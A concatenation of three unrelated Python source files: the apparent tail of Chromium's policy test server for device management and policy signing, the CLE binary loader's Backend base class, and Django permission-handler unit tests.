# Check the management token.
token, response = self.CheckToken()
if not token:
return response
# Unregister the device.
self.server.UnregisterDevice(token['device_token'])
# Prepare and send the response.
response = dm.DeviceManagementResponse()
response.unregister_response.CopyFrom(dm.DeviceUnregisterResponse())
self.DumpMessage('Response', response)
return (200, response.SerializeToString())
def ProcessPolicy(self, msg, request_type):
"""Handles a policy request.
Checks for authorization, encodes the policy into protobuf representation
and constructs the response.
Args:
msg: The DevicePolicyRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
token_info, error = self.CheckToken()
if not token_info:
return error
response = dm.DeviceManagementResponse()
for request in msg.request:
fetch_response = response.policy_response.response.add()
if (request.policy_type in
('google/android/user',
'google/chrome/extension',
'google/chromeos/device',
'google/chromeos/publicaccount',
'google/chromeos/user',
'google/chrome/user',
'google/ios/user')):
if request_type != 'policy':
fetch_response.error_code = 400
fetch_response.error_message = 'Invalid request type'
else:
self.ProcessCloudPolicy(request, token_info, fetch_response)
else:
fetch_response.error_code = 400
fetch_response.error_message = 'Invalid policy_type'
return (200, response.SerializeToString())
def ProcessAutoEnrollment(self, msg):
"""Handles an auto-enrollment check request.
The reply depends on the value of the modulus:
1: replies with no new modulus and the sha256 hash of "0"
2: replies with a new modulus, 4.
4: replies with a new modulus, 2.
8: fails with error 400.
16: replies with a new modulus, 16.
32: replies with a new modulus, 1.
anything else: replies with no new modulus and an empty list of hashes
These allow the client to pick the testing scenario its wants to simulate.
Args:
msg: The DeviceAutoEnrollmentRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
auto_enrollment_response = dm.DeviceAutoEnrollmentResponse()
if msg.modulus == 1:
auto_enrollment_response.hash.append(SHA256_0)
elif msg.modulus == 2:
auto_enrollment_response.expected_modulus = 4
elif msg.modulus == 4:
auto_enrollment_response.expected_modulus = 2
elif msg.modulus == 8:
return (400, 'Server error')
elif msg.modulus == 16:
auto_enrollment_response.expected_modulus = 16
elif msg.modulus == 32:
auto_enrollment_response.expected_modulus = 1
response = dm.DeviceManagementResponse()
response.auto_enrollment_response.CopyFrom(auto_enrollment_response)
return (200, response.SerializeToString())
def SetProtobufMessageField(self, group_message, field, field_value):
'''Sets a field in a protobuf message.
Args:
group_message: The protobuf message.
field: The field of the message to set, it should be a member of
group_message.DESCRIPTOR.fields.
field_value: The value to set.
'''
if field.label == field.LABEL_REPEATED:
assert type(field_value) == list
entries = group_message.__getattribute__(field.name)
if field.message_type is None:
for list_item in field_value:
entries.append(list_item)
else:
# This field is itself a protobuf.
sub_type = field.message_type
for sub_value in field_value:
assert type(sub_value) == dict
# Add a new sub-protobuf per list entry.
sub_message = entries.add()
# Now iterate over its fields and recursively add them.
for sub_field in sub_message.DESCRIPTOR.fields:
if sub_field.name in sub_value:
value = sub_value[sub_field.name]
self.SetProtobufMessageField(sub_message, sub_field, value)
return
elif field.type == field.TYPE_BOOL:
assert type(field_value) == bool
elif field.type == field.TYPE_STRING:
assert type(field_value) == str or type(field_value) == unicode
elif field.type == field.TYPE_INT64:
assert type(field_value) == int
elif (field.type == field.TYPE_MESSAGE and
field.message_type.name == 'StringList'):
assert type(field_value) == list
entries = group_message.__getattribute__(field.name).entries
for list_item in field_value:
entries.append(list_item)
return
else:
raise Exception('Unknown field type %s' % field.type)
group_message.__setattr__(field.name, field_value)
def GatherDevicePolicySettings(self, settings, policies):
'''Copies all the policies from a dictionary into a protobuf of type
CloudDeviceSettingsProto.
Args:
settings: The destination ChromeDeviceSettingsProto protobuf.
policies: The source dictionary containing policies in JSON format.
'''
for group in settings.DESCRIPTOR.fields:
# Create protobuf message for group.
group_message = eval('dp.' + group.message_type.name + '()')
# Indicates if at least one field was set in |group_message|.
got_fields = False
# Iterate over fields of the message and feed them from the
# policy config file.
for field in group_message.DESCRIPTOR.fields:
field_value = None
if field.name in policies:
got_fields = True
field_value = policies[field.name]
self.SetProtobufMessageField(group_message, field, field_value)
if got_fields:
settings.__getattribute__(group.name).CopyFrom(group_message)
def GatherUserPolicySettings(self, settings, policies):
'''Copies all the policies from a dictionary into a protobuf of type
CloudPolicySettings.
Args:
settings: The destination: a CloudPolicySettings protobuf.
policies: The source: a dictionary containing policies under keys
'recommended' and 'mandatory'.
'''
for field in settings.DESCRIPTOR.fields:
# |field| is the entry for a specific policy in the top-level
# CloudPolicySettings proto.
# Look for this policy's value in the mandatory or recommended dicts.
if field.name in policies.get('mandatory', {}):
mode = cp.PolicyOptions.MANDATORY
value = policies['mandatory'][field.name]
elif field.name in policies.get('recommended', {}):
mode = cp.PolicyOptions.RECOMMENDED
value = policies['recommended'][field.name]
else:
continue
# Create protobuf message for this policy.
policy_message = eval('cp.' + field.message_type.name + '()')
policy_message.policy_options.mode = mode
field_descriptor = policy_message.DESCRIPTOR.fields_by_name['value']
self.SetProtobufMessageField(policy_message, field_descriptor, value)
settings.__getattribute__(field.name).CopyFrom(policy_message)
def ProcessCloudPolicy(self, msg, token_info, response):
"""Handles a cloud policy request. (New protocol for policy requests.)
Encodes the policy into protobuf representation, signs it and constructs
the response.
Args:
msg: The CloudPolicyRequest message received from the client.
token_info: the token extracted from the request.
response: A PolicyFetchResponse message that should be filled with the
response data.
"""
if msg.machine_id:
self.server.UpdateMachineId(token_info['device_token'], msg.machine_id)
# Response is only given if the scope is specified in the config file.
# Normally 'google/chromeos/device', 'google/chromeos/user' and
# 'google/chromeos/publicaccount' should be accepted.
policy = self.server.GetPolicies()
policy_value = ''
policy_key = msg.policy_type
if msg.settings_entity_id:
policy_key += '/' + msg.settings_entity_id
if msg.policy_type in token_info['allowed_policy_types']:
if msg.policy_type in ('google/android/user',
'google/chromeos/publicaccount',
'google/chromeos/user',
'google/chrome/user',
'google/ios/user'):
settings = cp.CloudPolicySettings()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
self.GatherUserPolicySettings(settings, policy.get(policy_key, {}))
payload = settings.SerializeToString()
elif dp is not None and msg.policy_type == 'google/chromeos/device':
settings = dp.ChromeDeviceSettingsProto()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
self.GatherDevicePolicySettings(settings, policy.get(policy_key, {}))
payload = settings.SerializeToString()
elif msg.policy_type == 'google/chrome/extension':
settings = ep.ExternalPolicyData()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
payload = self.CreatePolicyForExternalPolicyData(policy_key)
else:
response.error_code = 400
response.error_message = 'Invalid policy type'
return
else:
response.error_code = 400
response.error_message = 'Request not allowed for the token used'
return
# Sign with 'current_key_index', defaulting to key 0.
signing_key = None
req_key = None
current_key_index = policy.get('current_key_index', 0)
nkeys = len(self.server.keys)
if (msg.signature_type == dm.PolicyFetchRequest.SHA1_RSA and
current_key_index in range(nkeys)):
signing_key = self.server.keys[current_key_index]
if msg.public_key_version in range(1, nkeys + 1):
# requested key exists, use for signing and rotate.
req_key = self.server.keys[msg.public_key_version - 1]['private_key']
# Fill the policy data protobuf.
policy_data = dm.PolicyData()
policy_data.policy_type = msg.policy_type
policy_data.timestamp = int(time.time() * 1000)
policy_data.request_token = token_info['device_token']
policy_data.policy_value = payload
policy_data.machine_name = token_info['machine_name']
policy_data.valid_serial_number_missing = (
token_info['machine_id'] in BAD_MACHINE_IDS)
policy_data.settings_entity_id = msg.settings_entity_id
policy_data.service_account_identity = policy.get(
'service_account_identity',
'policy_testserver.py-service_account_identity')
invalidation_source = policy.get('invalidation_source')
if invalidation_source is not None:
policy_data.invalidation_source = invalidation_source
# Since invalidation_name is type bytes in the proto, the Unicode name
# provided needs to be encoded as ASCII to set the correct byte pattern.
invalidation_name = policy.get('invalidation_name')
if invalidation_name is not None:
policy_data.invalidation_name = invalidation_name.encode('ascii')
if signing_key:
policy_data.public_key_version = current_key_index + 1
if msg.policy_type == 'google/chromeos/publicaccount':
policy_data.username = msg.settings_entity_id
else:
# For regular user/device policy, there is no way for the testserver to
# know the user name belonging to the GAIA auth token we received (short
# of actually talking to GAIA). To address this, we read the username from
# the policy configuration dictionary, or use a default.
policy_data.username = policy.get('policy_user', '[email protected]')
policy_data.device_id = token_info['device_id']
signed_data = policy_data.SerializeToString()
response.policy_data = signed_data
if signing_key:
response.policy_data_signature = (
signing_key['private_key'].hashAndSign(signed_data).tostring())
if msg.public_key_version != current_key_index + 1:
response.new_public_key = signing_key['public_key']
if req_key:
response.new_public_key_signature = (
req_key.hashAndSign(response.new_public_key).tostring())
self.DumpMessage('Response', response)
return (200, response.SerializeToString())
def CheckToken(self):
"""Helper for checking whether the client supplied a valid DM token.
Extracts the token from the request and passed to the server in order to
look up the client.
Returns:
A pair of token information record and error response. If the first
element is None, then the second contains an error code to send back to
the client. Otherwise the first element is the same structure that is
returned by LookupToken().
"""
error = 500
dmtoken = None
request_device_id = self.GetUniqueParam('deviceid')
match = re.match('GoogleDMToken token=(\\w+)',
self.headers.getheader('Authorization', ''))
if match:
dmtoken = match.group(1)
if not dmtoken:
error = 401
else:
token_info = self.server.LookupToken(dmtoken)
if (not token_info or
not request_device_id or
token_info['device_id'] != request_device_id):
error = 410
else:
return (token_info, None)
logging.debug('Token check failed with error %d' % error)
return (None, (error, 'Server error %d' % error))
def DumpMessage(self, label, msg):
"""Helper for logging an ASCII dump of a protobuf message."""
logging.debug('%s\n%s' % (label, str(msg)))
class PolicyTestServer(testserver_base.BrokenPipeHandlerMixIn,
testserver_base.StoppableHTTPServer):
"""Handles requests and keeps global service state."""
def __init__(self, server_address, data_dir, policy_path, client_state_file,
private_key_paths, server_base_url):
"""Initializes the server.
Args:
server_address: Server host and port.
policy_path: Names the file to read JSON-formatted policy from.
private_key_paths: List of paths to read private keys from.
"""
testserver_base.StoppableHTTPServer.__init__(self, server_address,
PolicyRequestHandler)
self._registered_tokens = {}
self.data_dir = data_dir
self.policy_path = policy_path
self.client_state_file = client_state_file
self.server_base_url = server_base_url
self.keys = []
if private_key_paths:
# Load specified keys from the filesystem.
for key_path in private_key_paths:
try:
key_str = open(key_path).read()
except IOError:
print 'Failed to load private key from %s' % key_path
continue
try:
key = tlslite.api.parsePEMKey(key_str, private=True)
except SyntaxError:
key = tlslite.utils.Python_RSAKey.Python_RSAKey._parsePKCS8(
tlslite.utils.cryptomath.stringToBytes(key_str))
assert key is not None
self.keys.append({ 'private_key' : key })
else:
# Generate 2 private keys if none were passed from the command line.
for i in range(2):
key = tlslite.api.generateRSAKey(512)
assert key is not None
self.keys.append({ 'private_key' : key })
# Derive the public keys from the private keys.
for entry in self.keys:
key = entry['private_key']
algorithm = asn1der.Sequence(
[ asn1der.Data(asn1der.OBJECT_IDENTIFIER, PKCS1_RSA_OID),
asn1der.Data(asn1der.NULL, '') ])
rsa_pubkey = asn1der.Sequence([ asn1der.Integer(key.n),
asn1der.Integer(key.e) ])
pubkey = asn1der.Sequence([ algorithm, asn1der.Bitstring(rsa_pubkey) ])
entry['public_key'] = pubkey
# Load client state.
if self.client_state_file is not None:
try:
file_contents = open(self.client_state_file).read()
self._registered_tokens = json.loads(file_contents, strict=False)
except IOError:
pass
def GetPolicies(self):
"""Returns the policies to be used, reloaded form the backend file every
time this is called.
"""
policy = {}
if json is None:
print 'No JSON module, cannot parse policy information'
else :
try:
policy = json.loads(open(self.policy_path).read(), strict=False)
except IOError:
print 'Failed to load policy from %s' % self.policy_path
return policy
def RegisterDevice(self, device_id, machine_id, type):
"""Registers a device or user and generates a DM token for it.
Args:
device_id: The device identifier provided by the client.
Returns:
The newly generated device token for the device.
"""
dmtoken_chars = []
while len(dmtoken_chars) < 32:
dmtoken_chars.append(random.choice('0123456789abcdef'))
dmtoken = ''.join(dmtoken_chars)
allowed_policy_types = {
dm.DeviceRegisterRequest.BROWSER: [
'google/chrome/user',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.USER: [
'google/chromeos/user',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.DEVICE: [
'google/chromeos/device',
'google/chromeos/publicaccount'
],
dm.DeviceRegisterRequest.ANDROID_BROWSER: [
'google/android/user'
],
dm.DeviceRegisterRequest.IOS_BROWSER: [
'google/ios/user'
],
dm.DeviceRegisterRequest.TT: ['google/chromeos/user',
'google/chrome/user'],
}
if machine_id in KIOSK_MACHINE_IDS:
enrollment_mode = dm.DeviceRegisterResponse.RETAIL
else:
enrollment_mode = dm.DeviceRegisterResponse.ENTERPRISE
self._registered_tokens[dmtoken] = {
'device_id': device_id,
'device_token': dmtoken,
'allowed_policy_types': allowed_policy_types[type],
'machine_name': 'chromeos-' + machine_id,
'machine_id': machine_id,
'enrollment_mode': enrollment_mode,
}
self.WriteClientState()
return self._registered_tokens[dmtoken]
def UpdateMachineId(self, dmtoken, machine_id):
"""Updates the machine identifier for a registered device.
Args:
dmtoken: The device management token provided by the client.
machine_id: Updated hardware identifier value.
"""
if dmtoken in self._registered_tokens:
self._registered_tokens[dmtoken]['machine_id'] = machine_id
self.WriteClientState()
def LookupToken(self, dmtoken):
"""Looks up a device or a user by DM token.
Args:
dmtoken: The device management token provided by the client.
Returns:
A dictionary with information about a device or user that is registered by
dmtoken, or None if the token is not found.
"""
return self._registered_tokens.get(dmtoken, None)
def UnregisterDevice(self, dmtoken):
"""Unregisters a device identified by the given DM token.
Args:
dmtoken: The device management token provided by the client.
"""
if dmtoken in self._registered_tokens.keys():
del self._registered_tokens[dmtoken]
self.WriteClientState()
def WriteClientState(self):
"""Writes the client state back to the file."""
if self.client_state_file is not None:
json_data = json.dumps(self._registered_tokens)
open(self.client_state_file, 'w').write(json_data)
def GetBaseFilename(self, policy_selector):
"""Returns the base filename for the given policy_selector.
Args:
policy_selector: the policy type and settings entity id, joined by '/'.
Returns:
The filename corresponding to the policy_selector, without a file
extension.
"""
sanitized_policy_selector = re.sub('[^A-Za-z0-9.@-]', '_', policy_selector)
return os.path.join(self.data_dir or '',
'policy_%s' % sanitized_policy_selector)
def ReadPolicyFromDataDir(self, policy_selector, proto_message):
"""Tries to read policy payload from a file in the data directory.
First checks for a binary rendition of the policy protobuf in
<data_dir>/policy_<sanitized_policy_selector>.bin. If that exists, returns
it. If that file doesn't exist, tries
<data_dir>/policy_<sanitized_policy_selector>.txt and decodes that as a
protobuf using proto_message. If that fails as well, returns None.
Args:
policy_selector: Selects which policy to read.
proto_message: Optional protobuf message object used for decoding the
proto text format.
Returns:
The binary payload message, or None if not found.
"""
base_filename = self.GetBaseFilename(policy_selector)
# Try the binary payload file first.
try:
return open(base_filename + '.bin').read()
except IOError:
pass
# If that fails, try the text version instead.
if proto_message is None:
return None
try:
text = open(base_filename + '.txt').read()
google.protobuf.text_format.Merge(text, proto_message)
return proto_message.SerializeToString()
except IOError:
return None
except google.protobuf.text_format.ParseError:
return None
def ReadPolicyDataFromDataDir(self, policy_selector):
"""Returns the external policy data for |policy_selector| if found.
Args:
policy_selector: Selects which policy to read.
Returns:
The data for the corresponding policy type and entity id, if found.
"""
base_filename = self.GetBaseFilename(policy_selector)
try:
return open(base_filename + '.data').read()
except IOError:
return None
def GetBaseURL(self):
"""Returns the server base URL.
Respects the |server_base_url| configuration parameter, if present. Falls
back to construct the URL from the server hostname and port otherwise.
Returns:
The URL to use for constructing URLs that get returned to clients.
"""
base_url = self.server_base_url
if base_url is None:
base_url = 'http://%s:%s' % self.server_address[:2]
return base_url
class PolicyServerRunner(testserver_base.TestServerRunner):
def __init__(self):
super(PolicyServerRunner, self).__init__()
def create_server(self, server_data):
data_dir = self.options.data_dir or ''
config_file = (self.options.config_file or
os.path.join(data_dir, 'device_management'))
server = PolicyTestServer((self.options.host, self.options.port),
data_dir, config_file,
self.options.client_state_file,
self.options.policy_keys,
self.options.server_base_url)
server_data['port'] = server.server_port
return server
def add_options(self):
testserver_base.TestServerRunner.add_options(self)
self.option_parser.add_option('--client-state', dest='client_state_file',
help='File that client state should be '
'persisted to. This allows the server to be '
'seeded by a list of pre-registered clients '
'and restarts without abandoning registered '
'clients.')
self.option_parser.add_option('--policy-key', action='append',
dest='policy_keys',
help='Specify a path to a PEM-encoded '
'private key to use for policy signing. May '
'be specified multiple times in order to '
'load multipe keys into the server. If the '
'server has multiple keys, it will rotate '
'through them in at each request in a '
'round-robin fashion. The server will '
'generate a random key if none is specified '
'on the command line.')
self.option_parser.add_option('--log-level', dest='log_level',
default='WARN',
help='Log level threshold to use.')
self.option_parser.add_option('--config-file', dest='config_file',
help='Specify a configuration file to use '
'instead of the default '
'<data_dir>/device_management')
self.option_parser.add_option('--server-base-url', dest='server_base_url',
help='The server base URL to use when '
'constructing URLs to return to the client.')
def run_server(self):
logger = logging.getLogger()
logger.setLevel(getattr(logging, str(self.options.log_level).upper()))
if (self.options.log_to_console):
logger.addHandler(logging.StreamHandler())
if (self.options.log_file):
logger.addHandler(logging.FileHandler(self.options.log_file))
testserver_base.TestServerRunner.run_server(self)
if __name__ == '__main__':
sys.exit(PolicyServerRunner().main())
|
|
import os
import logging
import archinfo
from .regions import Region, Segment, Section, Regions
from .symbol import Symbol
from ..address_translator import AT
from ..memory import Clemory
from ..errors import CLEOperationError, CLEError
l = logging.getLogger('cle.backends')
class Backend(object):
"""
Main base class for CLE binary objects.
An alternate interface to this constructor exists as the static method :meth:`cle.loader.Loader.load_object`
:ivar binary: The path to the file this object is loaded from
:ivar is_main_bin: Whether this binary is loaded as the main executable
:ivar segments: A listing of all the loaded segments in this file
:ivar sections: A listing of all the demarked sections in the file
:ivar sections_map: A dict mapping from section name to section
:ivar imports: A mapping from symbol name to import symbol
:ivar resolved_imports: A list of all the import symbols that are successfully resolved
:ivar relocs: A list of all the relocations in this binary
:ivar irelatives: A list of tuples representing all the irelative relocations that need to be performed. The
first item in the tuple is the address of the resolver function, and the second item is the
address of where to write the result. The destination address is an RVA.
:ivar jmprel: A mapping from symbol name to the address of its jump slot relocation, i.e. its GOT entry.
:ivar arch: The architecture of this binary
:vartype arch: archinfo.arch.Arch
:ivar str os: The operating system this binary is meant to run under
:ivar int mapped_base: The base address of this object in virtual memory
:ivar deps: A list of names of shared libraries this binary depends on
:ivar linking: 'dynamic' or 'static'
:ivar linked_base: The base address this object requests to be loaded at
:ivar bool pic: Whether this object is position-independent
:ivar bool execstack: Whether this executable has an executable stack
:ivar str provides: The name of the shared library dependancy that this object resolves
"""
def __init__(self,
binary,
loader=None,
is_main_bin=False,
filename=None,
custom_entry_point=None,
custom_arch=None,
custom_base_addr=None,
**kwargs):
"""
:param binary: The path to the binary to load
:param is_main_bin: Whether this binary should be loaded as the main executable
"""
if hasattr(binary, 'seek') and hasattr(binary, 'read'):
self.binary = filename
self.binary_stream = binary
else:
self.binary = binary
try:
self.binary_stream = open(binary, 'rb')
except IOError:
self.binary_stream = None
if kwargs != {}:
l.warning("Unused kwargs for loading binary %s: %s", self.binary, ', '.join(kwargs.iterkeys()))
self.is_main_bin = is_main_bin
self.loader = loader
self._entry = None
self._segments = Regions() # List of segments
self._sections = Regions() # List of sections
self.sections_map = {} # Mapping from section name to section
self._symbols_by_addr = {}
self.imports = {}
self.resolved_imports = []
self.relocs = []
self.irelatives = [] # list of tuples (resolver, destination), dest w/o rebase
self.jmprel = {}
self.arch = None
self.os = None # Let other stuff override this
self._symbol_cache = {}
self.mapped_base_symbolic = 0
# These are set by cle, and should not be overriden manually
self.mapped_base = self.linked_base = 0 # not to be set manually - used by CLE
self.deps = [] # Needed shared objects (libraries dependencies)
self.linking = None # Dynamic or static linking
self.pic = False
self.execstack = False
# Custom options
self._custom_entry_point = custom_entry_point
self._custom_base_addr = custom_base_addr
self.provides = os.path.basename(self.binary) if self.binary is not None else None
self.memory = None
# should be set inside `cle.Loader.add_object`
self._is_mapped = False
if custom_arch is None:
self.arch = None
elif isinstance(custom_arch, str):
self.set_arch(archinfo.arch_from_id(custom_arch))
elif isinstance(custom_arch, archinfo.Arch):
self.set_arch(custom_arch)
elif isinstance(custom_arch, type) and issubclass(custom_arch, archinfo.Arch):
self.set_arch(custom_arch())
else:
raise CLEError("Bad parameter: custom_arch=%s" % custom_arch)
def close(self):
if self.binary_stream is not None:
self.binary_stream.close()
self.binary_stream = None
def __repr__(self):
if self.binary is not None:
return '<%s Object %s, maps [%#x:%#x]>' % \
(self.__class__.__name__, os.path.basename(self.binary), self.min_addr, self.max_addr)
else:
return '<%s Object from stream, maps [%#x:%#x]>' % \
(self.__class__.__name__, self.min_addr, self.max_addr)
def set_arch(self, arch):
self.arch = arch
self.memory = Clemory(arch) # Private virtual address space, without relocations
@property
def image_base_delta(self):
return self.mapped_base - self.linked_base
@property
def entry(self):
if self._custom_entry_point is not None:
return AT.from_lva(self._custom_entry_point, self).to_mva()
return AT.from_lva(self._entry, self).to_mva()
@property
def segments(self):
return self._segments
@segments.setter
def segments(self, v):
if isinstance(v, list):
self._segments = Regions(lst=v)
elif isinstance(v, Regions):
self._segments = v
else:
raise ValueError('Unsupported type %s set as sections.' % type(v))
@property
def sections(self):
return self._sections
@sections.setter
def sections(self, v):
if isinstance(v, list):
self._sections = Regions(lst=v)
elif isinstance(v, Regions):
self._sections = v
else:
raise ValueError('Unsupported type %s set as sections.' % type(v))
@property
def symbols_by_addr(self):
return {AT.from_rva(x, self).to_mva(): self._symbols_by_addr[x] for x in self._symbols_by_addr}
def rebase(self):
"""
Rebase backend's regions to the new base where they were mapped by the loader
"""
if self._is_mapped:
raise CLEOperationError("Image already rebased from %#x to %#x" % (self.linked_base, self.mapped_base))
if self.sections:
self.sections._rebase(self.image_base_delta)
if self.segments:
self.segments._rebase(self.image_base_delta)
def contains_addr(self, addr):
"""
Is `addr` in one of the binary's segments/sections we have loaded? (i.e. is it mapped into memory ?)
"""
return self.find_loadable_containing(addr) is not None
def find_loadable_containing(self, addr):
lookup = self.find_segment_containing if self.segments else self.find_section_containing
return lookup(addr)
def find_segment_containing(self, addr):
"""
Returns the segment that contains `addr`, or ``None``.
"""
return self.segments.find_region_containing(addr)
def find_section_containing(self, addr):
"""
Returns the section that contains `addr` or ``None``.
"""
return self.sections.find_region_containing(addr)
def addr_to_offset(self, addr):
loadable = self.find_loadable_containing(addr)
if loadable is not None:
return loadable.addr_to_offset(addr)
else:
return None
def offset_to_addr(self, offset):
if self.segments:
for s in self.segments:
if s.contains_offset(offset):
return s.offset_to_addr(offset)
else:
for s in self.sections:
if s.contains_offset(offset):
return s.offset_to_addr(offset)
@property
def min_addr(self):
"""
This returns the lowest virtual address contained in any loaded segment of the binary.
"""
# Loader maps the object at chosen mapped base anyway and independently of the internal structure
return self.mapped_base
@property
def max_addr(self):
"""
This returns the highest virtual address contained in any loaded segment of the binary.
"""
# TODO: The access should be constant time, as the region interval is immutable after load
out = self.mapped_base
if self.segments or self.sections:
out = max(map(lambda x: x.max_addr, self.segments or self.sections))
return out
@property
def initializers(self): # pylint: disable=no-self-use
"""
Stub function. Should be overridden by backends that can provide initializer functions that ought to be run
before execution reaches the entry point. Addresses should be rebased.
"""
return []
@property
def finalizers(self): # pylint: disable=no-self-use
"""
Stub function. Like initializers, but with finalizers.
"""
return []
def get_symbol(self, name): # pylint: disable=no-self-use,unused-argument
"""
Stub function. Implement to find the symbol with name `name`.
"""
if name in self._symbol_cache:
return self._symbol_cache[name]
return None
@staticmethod
def extract_soname(path): # pylint: disable=unused-argument
"""
Extracts the shared object identifier from the path, or returns None if it cannot.
"""
return None
@classmethod
def check_compatibility(cls, spec, obj): # pylint: disable=unused-argument
"""
Performs a minimal static load of ``spec`` and returns whether it's compatible with other_obj
"""
return False
ALL_BACKENDS = dict()
def register_backend(name, cls):
if not hasattr(cls, 'is_compatible'):
raise TypeError("Backend needs an is_compatible() method")
ALL_BACKENDS.update({name: cls})
from .elf import ELF, ELFCore, MetaELF
from .pe import PE
from .idabin import IDABin
from .blob import Blob
from .cgc import CGC, BackedCGC
from .hex import Hex
from .macho import MachO
|
|
# coding=utf-8
from django.test import TestCase, override_settings
from ..handlers import PermissionHandler
from ..handlers import LogicalPermissionHandler
from .utils import create_user, create_article
from .models import Article
from .compat import MagicMock
@override_settings(
PERMISSION_DEFAULT_PERMISSION_HANDLER=PermissionHandler
)
class PermissionPermissionHandlersTestCase(TestCase):
def setUp(self):
self.handler = PermissionHandler
self.user = create_user('john')
self.perm1 = 'permission.add_article'
self.perm2 = 'permission.change_article'
self.perm3 = 'permission.delete_article'
self.article = create_article('test')
def test_constructor_with_model(self):
instance = self.handler(Article)
self.assertEqual(instance.app_label, 'permission')
self.assertEqual(instance.model, Article)
# backward reference
self.assertEqual(Article._permission_handler, instance)
def test_constructor_with_app_label(self):
instance = self.handler('permission')
self.assertEqual(instance.app_label, 'permission')
self.assertEqual(instance.model, None)
def test__get_app_perms_with_app_label(self):
instance = self.handler('permission')
perms = instance._get_app_perms()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
'permission.add_bridge',
'permission.change_bridge',
'permission.delete_bridge',
]))
def test__get_app_perms_with_model(self):
instance = self.handler(Article)
perms = instance._get_app_perms()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
'permission.add_bridge',
'permission.change_bridge',
'permission.delete_bridge',
]))
def test__get_model_perms(self):
instance = self.handler(Article)
perms = instance._get_model_perms()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
]))
def test_get_supported_permissions(self):
instance = self.handler(Article)
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
]))
def test_get_supported_permissions_with_includes(self):
instance = self.handler(Article)
instance.includes = [
'permission.add_article',
'permission.change_article',
]
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
]))
def test_get_supported_permissions_with_includes_change(self):
instance = self.handler(Article)
instance.includes = [
'permission.add_article',
'permission.change_article',
]
instance.get_supported_permissions()
instance.includes = [
'permission.change_article',
]
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.change_article',
]))
def test_get_supported_permissions_with_excludes(self):
instance = self.handler(Article)
instance.excludes = [
'permission.add_article',
]
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.change_article',
'permission.delete_article',
]))
def test_get_supported_permissions_with_excludes_change(self):
instance = self.handler(Article)
instance.excludes = [
'permission.add_article',
]
instance.get_supported_permissions()
instance.excludes = []
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
]))
def test_get_supported_app_labels(self):
instance = self.handler(Article)
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_get_supported_app_labels_with_includes(self):
instance = self.handler(Article)
instance.includes = [
'permission.add_article',
'permission.change_article',
]
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_get_supported_app_labels_with_includes_change(self):
instance = self.handler(Article)
instance.includes = [
'permission.add_article',
'permission.change_article',
]
instance.get_supported_app_labels()
instance.includes = [
'permission.change_article',
]
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_get_supported_app_labels_with_excludes(self):
instance = self.handler(Article)
instance.excludes = [
'permission.add_article',
]
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_get_supported_app_labels_with_excludes_change(self):
instance = self.handler(Article)
instance.excludes = [
'permission.add_article',
]
instance.get_supported_app_labels()
instance.excludes = []
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_has_perm_add_wihtout_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm1)
def test_has_perm_change_wihtout_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm2)
def test_has_perm_delete_wihtout_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm3)
def test_has_perm_add_wiht_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm1, self.article)
def test_has_perm_change_wiht_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm2, self.article)
def test_has_perm_delete_wiht_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm3, self.article)
def test_has_module_perms_success(self):
instance = self.handler(Article)
user = MagicMock()
user.has_perm.return_value = True
self.assertTrue(instance.has_module_perms(user, 'permission'))
self.assertTrue(user.has_perm.called)
def test_has_module_perms_fail(self):
instance = self.handler(Article)
user = MagicMock()
user.has_perm.return_value = True
self.assertFalse(instance.has_module_perms(user, 'unknown'))
self.assertFalse(user.has_perm.called)
@override_settings(
PERMISSION_DEFAULT_PERMISSION_HANDLER=LogicalPermissionHandler,
)
class PermissionLogicalPermissionHandlerTestCase(TestCase):
def setUp(self):
# make sure all caches are removed
Article._permission_logics = set()
self.handler = LogicalPermissionHandler
self.user = create_user('john')
self.perm1 = 'permission.add_article'
self.perm2 = 'permission.change_article'
self.perm3 = 'permission.delete_article'
self.article = create_article('test')
from permission.logics import PermissionLogic
from permission import add_permission_logic
self.mock_logic1 = MagicMock(spec=PermissionLogic)
self.mock_logic1.has_perm = MagicMock(return_value=False)
self.mock_logic2 = MagicMock(spec=PermissionLogic)
self.mock_logic2.has_perm = MagicMock(return_value=False)
add_permission_logic(Article, self.mock_logic1)
add_permission_logic(Article, self.mock_logic2)
def test_constructor_with_app_label(self):
self.assertRaises(AttributeError,
self.handler, 'permission')
def test_has_perm_non_related_permission(self):
instance = self.handler(Article)
instance.get_supported_permissions = MagicMock(return_value=[
'permission.add_article',
'permission.change_article',
'permission.delete_article',
])
self.assertFalse(instance.has_perm(self.user, 'unknown'))
